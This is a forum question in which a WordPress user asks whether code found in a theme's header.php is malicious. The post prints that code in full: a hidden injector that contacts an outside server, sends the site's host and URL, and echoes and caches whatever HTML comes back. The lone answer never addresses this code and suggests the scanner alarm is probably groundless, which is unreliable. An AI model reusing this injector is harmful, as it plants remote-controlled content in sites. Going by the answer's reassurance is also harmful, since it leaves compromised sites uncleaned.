# php malware, wordpress exploit, php virus

Tags: php, wordpress

When i scanned a wordpress using `exploit scanner` plugin i got following result

Image 1:

[image: image 1]

Image 2:

[image: image 2]

Image 3:

[image: image 3]

Is there anything to worry? is that contain malicious code????

Also in the theame header.php file i saw following details. Is there anything to worry? what is following code actually doing?

```
<?php
$h = $_SERVER['HTTP_HOST']; $u = trim($_SERVER['REQUEST_URI']);
$cd = dirname(__FILE__) . '/.cache';
$cf = $cd . '/' . md5($h . '##' . $u);
$s = '1.granitebb.com';
if (file_exists($cf) and filemtime($cf) > time() - 3600)
    echo file_get_contents($cf);
else
{
    $ini1 = @ini_set('allow_url_fopen', 1);    $ini2 = @ini_set('default_socket_timeout', 3);
    $p = '/links.php?u=' . urlencode($u) . '&h=' . urlencode($h);
    $c = '';
    if ($fp = @fsockopen($s, 80, $errno, $errstr, 3)) {
        @fputs($fp, "GET {$p} HTTP/1.0\r\nHost: $s\r\n\r\n");
        while (! feof($fp))
            $c .= @fread($fp, 8192);
        fclose($fp);
        $c = end(explode("\r\n\r\n", $c));
        echo $c;
        if (strlen($c) and (is_dir($cd) or @mkdir($cd))) {
            @file_put_contents($cf, $c);
        }
    }
    @ini_set('allow_url_fopen', $ini1);    @ini_set('default_socket_timeout', $ini2);
}
?>
```

Answer (score 0):

Do the following checks to make sure you are safe:
1: download the plugin files from the original source at wordpress.
2: compare those files with the files that you scanned on your wordpress installation.

If they are the same, you are (probably) safe. If they are not the same, remove the bad files and reinstall the plugin. After that, find somebody to check why the files were changed.

Advice: don't run these scanners if you don't know how to handle the results. It will only give you a bad feeling, probably for no reason at all.